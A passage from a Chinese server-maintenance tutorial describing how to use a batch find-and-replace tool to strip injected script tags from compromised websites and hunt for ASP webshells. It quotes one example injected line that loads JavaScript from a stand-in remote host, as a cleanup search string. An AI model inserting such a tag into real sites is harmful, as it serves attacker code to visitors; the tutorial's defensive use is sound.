服务器维护的九大必备武器

　　服务器毕竟是暴露在公网中，难免会有入侵者的光顾，然后入侵者总是"来也匆匆去也匆匆"，从来不会告诉你什么时候他来过，走的时候留下过什么脚印，这给我们服务器管理加了一大难题，如何在变化无常的数据中找出蛛丝马迹，同时我们又应该如何加强防卫工作呢？
　　
　　带着这些问题，我们开始进入主题"服务器维护的九大必备武器"。

　　武器一：批量字符修改工具

　　通过后门漏洞注入病毒代码是最为常见的入侵方式，入侵者通常会将首页或所有页面注入类似如下病毒木马代码。

　　<script src="http://test.com/test.js"></script>

　　如果入侵者只是写入一个首页文件，我们只需要删除即可，可万一入侵者将所有文件都写入了如下代码，此时我们如何是好？如果站点程序上几百、几千或更多时怎么办？一个一个文件来修改删除不现实，我们可以通过一个叫《批量字符修改器》的工具来帮助我们完成清除病毒代码的工作，使用方法非常简单，在查找处输入<script src="http://test.com/test.js"></script>被入侵的病毒代码（如图1），然后替换为选项中留为空，文件类型视程序情况而定，如果想替换全部文件中的病毒代码直接输入"*"号即可。如果只是想修改ASP程序可以输入"*.asp"，输入所在文件夹，然后区分大小写、保存备份、仅替换字词及包括子文件夹，这里我们需要把"包括子文件夹" 选上，然后点击全换，程序就会自动更换了。我们可以非常轻松的实现批量修复站点。但是大家一定要在修复前先把数据备份一份，或在替换修复前选上"保存备份"功能，以免在出现错误后可还原。

    那么以上做法我们是清除了相应被插入的病毒代码，但是可能过一会入侵者在继续批量修改注入病毒代码，这时我们应该如何是好，通常这种情况是系统没有做好安全加固，稍后我们会介绍加固方面的工具，但现在我们要找到这个ASP木马程序放在那，我们依然使用此工具来操作，通过修改相应的执行命令来排错。

    我们通过查找常见木马程序中的关键词（如表1），然后通过《超级批量字符修改器》来搜索ASP木马最常见的关键词，然后查看文件源代码来分析是否是自己站点程序来排错。

表1

    
    那么除了以上我介绍的使用技巧以外，我们还有很多可以利用的地方，大家可以思考一下它还可以怎么加以利用，想到了可以到以下BBS论坛帖子发帖，我们一齐来互动交流学习！